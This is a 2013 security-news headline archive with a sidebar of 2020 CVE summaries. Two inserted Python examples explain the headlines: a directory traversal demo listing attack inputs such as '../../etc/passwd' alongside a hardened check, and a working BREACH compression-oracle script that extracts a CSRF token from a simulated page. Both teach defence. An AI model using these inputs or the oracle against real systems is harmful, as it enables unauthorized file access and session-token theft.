
News & Commentary

Content tagged with Vulnerabilities / Threats posted in August 2013
Malicious Chrome Extension Poses As Facebook Video
News  |  8/30/2013  | 
As malware attacks targeting browser extensions become more common, security researchers advise users to be more careful about installing extensions and to regularly review permissions.
Kelihos Botnet Taps Spam Blocklists To Hone Attacks
News  |  8/30/2013  | 
Malware taps legitimate anti-spam services from the likes of SpamHaus and Sophos before turning PC into control proxy or spam relay.
Java Malicious App Alert System Tricked
Quick Hits  |  8/30/2013  | 
Developer hacks Java security warnings to display fake app names; Oracle reportedly prepping a fix.
IPv6 To Complicate Threat-Intelligence Landscape
News  |  8/30/2013  | 
Reputation-based blacklists could face exponential growth when the number of possible Internet addresses becomes, for all practical purposes, infinite.
Windows 8 Picture Passwords Easily Cracked
News  |  8/29/2013  | 
Microsoft's picture gesture authentication system isn't that secure, security researchers say.
No Proof Of Malware In New York Times DNS Hijacking Attack
News  |  8/29/2013  | 
No evidence thus far to confirm that the Syrian Electronic Army embedded malware on redirected Web pages, but investigation continues
Talking Threats With Senior Management
Commentary  |  8/29/2013  | 
Every so often, you get lucky and a senior executive asks you about security. You have some choices as to how to answer the question. Choose wisely.
Secure Data, Not Devices
Commentary  |  8/29/2013  | 
As government goes mobile and makes greater use of cloud services, IT leaders must adopt a more data-centric, not device-centric, security approach.
New Security Trend: Bring Your Own Attorney
Commentary  |  8/28/2013  | 
BYOA is not a security joke anymore. There is clearly a need for a cybersecurity community that is well-versed in legal and ethical principles.
Feds Charge Wall Street Traders With Code Theft
News  |  8/28/2013  | 
Three men accused of stealing Flow Traders' proprietary high-frequency trading information and algorithms.
NY Times Caught In Syrian Hacker Attack
News  |  8/28/2013  | 
Hacks amount to "warning shots," threatening more widespread cyberattacks should the U.S. and allies launch military campaign against Syria, warns security expert.
Department Of Energy Cyberattack: 5 Takeaways
News  |  8/27/2013  | 
Exclusive: Outdated, unpatched system blamed for DOE breach, but agency said to be getting its cybersecurity house in order.
Getting The Most Out Of A Security Red Team
News  |  8/27/2013  | 
Justify security expenses and improve defenses through the use of an internal red team.
Hackers Target Java 6 With Security Exploits
News  |  8/26/2013  | 
Security experts spot code that attacks vulnerability in Java 6, urge users to upgrade to Java 7 immediately.
Nearly One-Fifth Of Enterprise Operating Systems Not Fully Patched
Quick Hits  |  8/23/2013  | 
Less than half of organizations run malicious code execution prevention tools, Rapid7 survey finds
Hack My Google Glass: Security's Next Big Worry?
Commentary  |  8/23/2013  | 
Wearable computing devices must strike a difficult balance between security and convenience. A recent episode involving Google Glass and malicious QR codes raises questions.
Russia May Block Tor
News  |  8/22/2013  | 
In an effort to combat child porn, Russian security forces consider installing filters preventing access to the Tor network. But experts say blocking the anonymizing service could be difficult.
FBI: Anonymous Not Same Since LulzSec Crackdown
News  |  8/22/2013  | 
Bureau says that after "dismantlement of the largest players" in LulzSec, domestic hacktivism remains a shadow of its former self.
How Hacktivists Have Targeted Major Media Outlets
News  |  8/21/2013  | 
From the Washington Post and CNN to the Twitter feeds of the Associated Press and Reuters, hacktivists have news outlets -- and their social-media presence -- in their crosshairs.
Natural Disasters Cause More Downtime Than Hackers
News  |  8/21/2013  | 
Study of 79 Internet and telephony outages in 18 European countries found that storms -- especially snowstorms -- caused significantly longer outages than cyberattacks.
Hacker Leaks 15,000 Twitter Access Credentials, Promises More
News  |  8/21/2013  | 
Twitter users should revoke and reassign access for all third-party Twitter apps to mitigate vulnerability, security expert urges.
Microsoft Windows Defender Stumbles In Malware Tests
News  |  8/21/2013  | 
Microsoft's free anti-virus software came in last among 23 programs at catching known malware in an AV program shootout, says independent testing firm.
Microsoft Patch Problems Underline Trade-Offs For Securing Systems
News  |  8/21/2013  | 
As the software giant works to fix the shortcomings in its latest set of patches, security experts debate whether 'trust the patch' is still the best course.
Facebook Declines Bug Bounty, But Crowdsourced Effort Pays
News  |  8/20/2013  | 
Security researchers, unhappy with Facebook's decision to withhold reward, come up with the cash on their own.
Kid Hackers Bag Bug Bounties
News  |  8/19/2013  | 
DEF CON Kid and co-founder of R00tz Asylum also names the mobile apps affected by the 'Time Traveler' class of vulnerabilities she discovered two years ago.
Prohibition For 0-Day Exploits
Commentary  |  8/19/2013  | 
The monetization of exploits has been a divisive discussion in the security community for years. Now as governments emerge as the largest market for attack code, will there be a move to regulate the sale of 0-day attacks?
Google's Four Minute Blackout Examined
News  |  8/19/2013  | 
Google hasn't explained Friday's four-minute blackout of all Google services, but experts say a hack attack is not the likely cause.
Tech Insight: DEF CON 21 Highlights Dangers Of Social Engineering
News  |  8/16/2013  | 
Popular contest and presentation show real risks associated with social engineering.
Researchers Seek Better Ways To Track Malware's Family Tree
News  |  8/15/2013  | 
Following a program's evolution back to the author may not yet be a reality, but computer scientists are searching for more accurate measures of the relationships between software versions.
Don't Underestimate Directory Traversal Attacks
News  |  8/15/2013  | 
Are attackers dot-dot-slashing their way into your data?
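The "dot-dot-slash" pattern the item above refers to, as an added example in Python that is not code from the article: a naive path join, the common but broken "strip ../" fix that "....//" walks straight through, and a containment check on the resolved path. The download root and the request strings are constructed for the example; none of them come from the page.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Constructed example: the directory a download handler is allowed to serve.
# It does not need to exist; os.path.realpath still normalises the path.
DOWNLOAD_ROOT = "/srv/app/downloads"


def vulnerable_path(root: str, requested: str) -> str:
    """The classic bug: join the client-supplied name straight onto the root.

    Two things go wrong: '..' segments walk out of root, and if the client
    sends an absolute path, os.path.join discards root entirely.  normpath
    is purely lexical, so the result shows where the open() would land.
    """
    return os.path.normpath(os.path.join(root, unquote(requested)))


def weak_path(root: str, requested: str) -> str:
    """A frequent 'fix' that deletes '../' once; '....//' survives as '../'."""
    stripped = unquote(requested).replace("../", "")
    return os.path.normpath(os.path.join(root, stripped))


def safe_path(root: str, requested: str) -> Optional[str]:
    """Resolve the request and keep it only if it stays inside root.

    realpath collapses '.', '..', repeated slashes and symlinks; commonpath
    then checks containment on the resolved paths rather than on the raw
    string, so a sibling such as '/srv/app/downloads_old' is not accepted as
    a prefix match either.  Decode percent-encoding exactly once, before the
    join, so '%2e%2e%2f' is judged as '../' and not as a harmless name.
    """
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, unquote(requested)))
    try:
        inside = os.path.commonpath([root_real, target]) == root_real
    except ValueError:  # paths on different drives (Windows)
        inside = False
    return target if inside else None


# Constructed sample of request values a handler might see in its logs.
SAMPLE_REQUESTS = [
    "reports/q3.pdf",             # legitimate
    "../../etc/passwd",           # plain traversal
    "/etc/passwd",                # absolute path; os.path.join drops root
    "%2e%2e/%2e%2e/etc/passwd",   # percent-encoded dots
    "....//etc/passwd",           # beats the strip-once filter
]


def audit(requests=SAMPLE_REQUESTS, root: str = DOWNLOAD_ROOT):
    """Return (request, naive target, weak-filter target, hardened verdict)."""
    return [
        (r, vulnerable_path(root, r), weak_path(root, r), safe_path(root, r))
        for r in requests
    ]


if __name__ == "__main__":
    for req, naive, weak, safe in audit():
        print(f"{req!r:30} naive={naive}  weak={weak}  hardened={safe}")
```

Run it and compare the three columns: only the last one refuses every escape, and it does so without a denylist of strings. Double-encoded input (`%252e`) stays a literal `%2e` after one decode, which is the right outcome as long as every layer in front of the check decodes the same number of times.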
Rogue Ad Networks Deliver Malware To Mobile Devices
News  |  8/15/2013  | 
Software developers in search of more income are adopting relatively unknown ad networks, but the frameworks may deliver more than just ads, warn security firms.
3 Signs You're Phishing Bait
News  |  8/14/2013  | 
Beware, introverts and overconfident people. Phishers love to fool you, email security researchers say.
Android Malware Being Delivered Via Ad Networks
News  |  8/13/2013  | 
Attackers are using mobile ad network software installed on smartphones to push malicious JavaScript and take control of devices.
Spying Trash Cans Banned
News  |  8/12/2013  | 
Foot-traffic counting scheme spooks London city managers.
Microsoft Plans Critical Patches For Internet Explorer, Exchange
News  |  8/12/2013  | 
Microsoft's security patches Tuesday will fix three critical vulnerabilities, including one that affects all current versions of Internet Explorer.
Attackers' Toolbox Makes Malware Detection More Difficult
News  |  8/12/2013  | 
From virtual-machine detection to taking a 30-minute nap, the array of techniques used by attackers to stymie malware analysis is growing.
Report: Google Play Store Infested With Adware
Quick Hits  |  8/12/2013  | 
In a study of 8,000 apps on Google Play, nearly 2,000 are flagged as adware, ZScaler says.
Black Hat: The Problems Don't Change, But The Solutions Have
Commentary  |  8/9/2013  | 
An increase in attacker capabilities has drawn an innovative response from industry, and emerging research promises more to come.
Maltego Gets More 'Teeth'
News  |  8/9/2013  | 
New features in Maltego, an open-source intelligence tool for defenders, allow penetration testers and attackers to gather data on vulnerable systems and manage botnets.
Chrome Security Shocker Creates Password Anxiety
News  |  8/8/2013  | 
Google responds to criticism of stored password handling; security experts say Chrome security team is missing the forest for the trees.
30-Second HTTPS Traffic Attack: No Fix
News  |  8/8/2013  | 
Researchers who discovered BREACH vulnerability promise a tool to see if your site is at risk -- but say there's no easy fix.
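How the BREACH measurement works, as an added Python example that is neither the researchers' tool nor code from the article: a constructed page embeds an anti-CSRF token in a link and reflects an attacker-controlled query string on the same page. The attacker never reads the page, only the compressed size of each response, and recovers the token one character at a time because a correct guess lets DEFLATE's LZ77 stage match one more byte of the real token. zlib's static-Huffman strategy (`Z_FIXED`) is used so that the size signal is exact; the page contents, token, parameter name and alphabet are all invented for the example.

```python
import zlib

# Constructed stand-in for a TLS-protected page: the attacker cannot read it,
# but can observe the size of each compressed response.  It carries a
# per-session anti-CSRF token and reflects a query parameter verbatim.
SECRET = "b7f3"                    # short so the run needs only 80 requests
ALPHABET = "0123456789abcdef"      # character set the attacker assumes

PAGE_TEMPLATE = (
    "<html><body>\n"
    "<ul>\n"
    "<li><a href='/account/home'>Home</a></li>\n"
    "<li><a href='/account/history'>History</a></li>\n"
    "<li><a href='/account/settings'>Settings</a></li>\n"
    "</ul>\n"
    "<a href='/account/transfer?csrf={secret}'>Transfer funds</a>\n"
    "<p>No results for: {reflected}~</p>\n"
    "</body></html>\n"
)


def compressed_len(body: str, strategy: int = zlib.Z_FIXED) -> int:
    """Size of the body after DEFLATE, as HTTP gzip/deflate would send it.

    Z_FIXED forces the static Huffman table, so only LZ77 matching changes
    the size.  With zlib's default dynamic Huffman coding the same signal is
    present but noisy; the BREACH paper handles that by sending each guess
    twice with the padding on either side of it ("two tries").
    """
    c = zlib.compressobj(6, zlib.DEFLATED, 15, 8, strategy)
    return len(c.compress(body.encode()) + c.flush())


def server_response_len(reflected: str, secret: str = SECRET) -> int:
    """What the attacker observes: the size of one compressed response."""
    return compressed_len(PAGE_TEMPLATE.format(secret=secret, reflected=reflected))


def recover_token(oracle, alphabet: str = ALPHABET, max_len: int = 16) -> str:
    """Rebuild the token one character at a time from the size oracle.

    The reflected string is 'csrf=' + known prefix + one guessed character.
    A right guess extends the LZ77 match against the real 'csrf=<token>' by
    one byte and removes one literal, so the response shrinks by a byte;
    every wrong guess costs the same.  When all guesses cost the same, no
    character extends the match any further and the token is complete.
    """
    known = ""
    for _ in range(max_len):
        costs = {g: oracle("csrf=" + known + g) for g in alphabet}
        best = min(costs, key=costs.get)
        if costs[best] == max(costs.values()):
            break
        known += best
    return known


if __name__ == "__main__":
    print("recovered:", recover_token(server_response_len))
```

Swap `zlib.Z_FIXED` for `zlib.Z_DEFAULT_STRATEGY` in `compressed_len` to see the noise the paper describes. The defences that follow from the mechanism are the ones the researchers list: do not compress responses that mix a secret with reflected input, move the secret out of such pages, or randomize or mask the token per request so that no two responses carry the same bytes to match against.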
Timing Attacks On Browsers Leak Sensitive Information
News  |  8/8/2013  | 
Variations in the redraw times of graphical elements could let an attacker learn which sites a user has visited and other sensitive information.
Medical-Device Flaws Will Take Time To Heal
News  |  8/7/2013  | 
Manufacturers are slow to patch up security issues, despite increasing pressure from patients, researchers and federal agencies.
Android Trojan Banking App Targets Master Key Vulnerability
News  |  8/6/2013  | 
Sluggish Android updates put users at risk. Could rising public awareness of the flaw lead carriers and device makers to patch more quickly?
Black Hat: Lessons For SMBs From The Dark Side Of Security
News  |  8/6/2013  | 
Issues affecting large enterprises are the bread and butter of Black Hat, but even smaller firms have something to learn.
Android One-Click Google Apps Access Cracked
News  |  8/5/2013  | 
Hackers could intercept Android users' unique authentication token and gain unauthorized access to Google Apps, Gmail, Drive and other services.
Water-Utility Honeynet Illuminates Real-World SCADA Threats
News  |  8/2/2013  | 
After a researcher constructs a fake water-utility network and puts it online, attackers quickly target the systems.
iOS Weaknesses Allow Attacks Via Trojan Chargers
News  |  8/1/2013  | 
Using weaknesses in Apple's mobile operating system, a simple computer disguised as a charging station can pair with, and then install malware on, any iPhone or iPad that connects to it.
Creating Browser-Based Botnets Through Online Ad Networks
News  |  8/1/2013  | 
Researchers demonstrate how ads invoking JavaScript on viewers' browsers en masse could create untraceable networks to wreak DDoS damage.


Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2020-25288
PUBLISHED: 2020-09-30
An issue was discovered in MantisBT before 2.24.3. When editing an Issue in a Project where a Custom Field with a crafted Regular Expression property is used, improper escaping of the corresponding form input's pattern attribute allows HTML injection and, if CSP settings permit, execution of arbitra...
CVE-2020-25781
PUBLISHED: 2020-09-30
An issue was discovered in file_download.php in MantisBT before 2.24.3. Users without access to view private issue notes are able to download the (supposedly private) attachments linked to these notes by accessing the corresponding file download URL directly.
CVE-2020-25830
PUBLISHED: 2020-09-30
An issue was discovered in MantisBT before 2.24.3. Improper escaping of a custom field's name allows an attacker to inject HTML and, if CSP settings permit, achieve execution of arbitrary JavaScript when attempting to update said custom field via bug_actiongroup_page.php.
CVE-2020-26159
PUBLISHED: 2020-09-30
In Oniguruma 6.9.5_rev1, an attacker able to supply a regular expression for compilation may be able to overflow a buffer by one byte in concat_opt_exact_str in src/regcomp.c.
CVE-2020-6654
PUBLISHED: 2020-09-30
A DLL Hijacking vulnerability in Eaton's 9000x Programming and Configuration Software v 2.0.38 and prior allows an attacker to execute arbitrary code by replacing the required DLLs with malicious DLLs when the software tries to load vci11un6.DLL and cinpl.DLL.